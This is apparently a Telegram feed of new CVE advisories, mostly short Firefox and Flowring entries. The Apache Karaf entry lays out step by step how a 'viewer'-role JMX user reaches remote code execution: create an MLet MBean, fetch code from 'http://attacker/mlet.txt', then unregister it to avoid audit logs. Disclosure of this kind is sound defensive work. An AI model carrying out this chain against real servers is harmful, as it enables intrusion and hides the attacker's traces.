CVE tracker
394 subscribers
5.73K links
News monitoring: @irnewsagency

Main channel: @orgsecuritygate

Site: SecurityGate.org
Download Telegram
CVE-2026-92142 - Apache Karaf: Authorization bypass in JMX MBean lifecycle operations

CVE ID :CVE-2026-92142
Published : Sept. 29, 2026, 8:40 a.m. | 46 minutes ago
Description :Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:   private final List guarded = Collections.unmodifiableList( Arrays.asList("invoke", "getAttribute", "getAttributes", "setAttribute", "setAttributes")); The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg. As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged "viewer" role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches). This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard's existing "invoke" check, but the default etc/jmx.acl.cfg grants the "viewer" role to any method name matching the wildcard rule "get* = viewer", a heuristic intended for read-only getters. Because "getMBeansFromURL" happens to start with "get", it also matches that rule, so a default installation grants "viewer" callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a "viewer"-role JMX client a path to remote code execution to the Karaf JVM: * Authenticate to JMX as any user with any role (e.g. "viewer"). * mbs.createMBean("javax.management.loading.MLet", objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered. * mbs.invoke(objectName, "getMBeansFromURL", new Object[]{"http://attacker/mlet.txt"}, ...) is guarded, but the method name matches the default "get* = viewer" ACL rule, so permitted. * The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM. * mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail. The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the "admin" role. This allows deployments to also write class-name-specific rule, e.g.: createMBean(java.lang.String)[/javax\.management\.loading\..*/] = admin Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-"admin" JMX credentiels.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-96440 - Flowring Agentflow 4.0 - Improper Limitation of a Pathname to a Restricted Directory(Path Traversal)

CVE ID :CVE-2026-96440
Published : Sept. 29, 2026, 8:46 a.m. | 40 minutes ago
Description :Improper Limitation of a Pathname to a Restricted Directory(Path Traversal) in the /WebAgenda/download/uploadFile.jsp API endpoint of Flowring Agentflow 4.0 version before 2023/03/24 allows remote authenticated users to write files to arbitrary locations outside the intended upload directory via the path parameter.
Severity: 7.1 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100809 - Same-origin policy bypass in the DevTools component

CVE ID :CVE-2026-100809
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Same-origin policy bypass in the DevTools component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100810 - Other issue in the DevTools component

CVE ID :CVE-2026-100810
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Other issue in the DevTools component. This vulnerability was fixed in Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100811 - Sandbox escape due to use-after-free in the DOM: Core & HTML component

CVE ID :CVE-2026-100811
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Sandbox escape due to use-after-free in the DOM: Core & HTML component. This vulnerability was fixed in Firefox ESR 153.4, Firefox 157, and Firefox ESR 140.17.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100812 - Denial-of-service in the Graphics component

CVE ID :CVE-2026-100812
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Denial-of-service in the Graphics component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100813 - Invalid pointer in the JavaScript Engine: JIT component

CVE ID :CVE-2026-100813
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Invalid pointer in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100814 - Incorrect boundary conditions in the JavaScript Engine: JIT component

CVE ID :CVE-2026-100814
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Incorrect boundary conditions in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100815 - Use-after-free in the CSS Parsing and Computation component

CVE ID :CVE-2026-100815
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Use-after-free in the CSS Parsing and Computation component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100816 - Site isolation issue in the DOM: Networking component

CVE ID :CVE-2026-100816
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Site isolation issue in the DOM: Networking component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100817 - Other issue in the JavaScript: WebAssembly component

CVE ID :CVE-2026-100817
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Other issue in the JavaScript: WebAssembly component. This vulnerability was fixed in Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100818 - Sandbox escape due to use-after-free in the Widget: Gtk component

CVE ID :CVE-2026-100818
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Sandbox escape due to use-after-free in the Widget: Gtk component. This vulnerability was fixed in Firefox ESR 153.4, Firefox 157, and Firefox ESR 140.17.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100819 - Sandbox escape due to incorrect boundary conditions in the XPCOM component

CVE ID :CVE-2026-100819
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Sandbox escape due to incorrect boundary conditions in the XPCOM component. This vulnerability was fixed in Firefox ESR 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100820 - Privilege escalation in the Address Bar component

CVE ID :CVE-2026-100820
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Privilege escalation in the Address Bar component. This vulnerability was fixed in Firefox ESR 153.4, Firefox 157, and Firefox ESR 140.17.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100821 - Site isolation issue in the Panning and Zooming component

CVE ID :CVE-2026-100821
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Site isolation issue in the Panning and Zooming component. This vulnerability was fixed in Firefox ESR 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100822 - Spoofing issue in the Networking: HTTP component

CVE ID :CVE-2026-100822
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Spoofing issue in the Networking: HTTP component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100823 - Spoofing issue in the Downloads component in Firefox for Android

CVE ID :CVE-2026-100823
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Spoofing issue in the Downloads component in Firefox for Android. This vulnerability was fixed in Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100824 - Privilege escalation in the Places component

CVE ID :CVE-2026-100824
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Privilege escalation in the Places component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100825 - Use-after-free in the JavaScript Engine: JIT component

CVE ID :CVE-2026-100825
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Use-after-free in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100826 - Denial-of-service in the Storage: StorageManager component

CVE ID :CVE-2026-100826
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Denial-of-service in the Storage: StorageManager component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
CVE-2026-100828 - Mitigation bypass in the Bookmarks & History component

CVE ID :CVE-2026-100828
Published : Sept. 29, 2026, 12:36 p.m. | 50 minutes ago
Description :Mitigation bypass in the Bookmarks & History component. This vulnerability was fixed in Firefox ESR 153.4 and Firefox 157.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...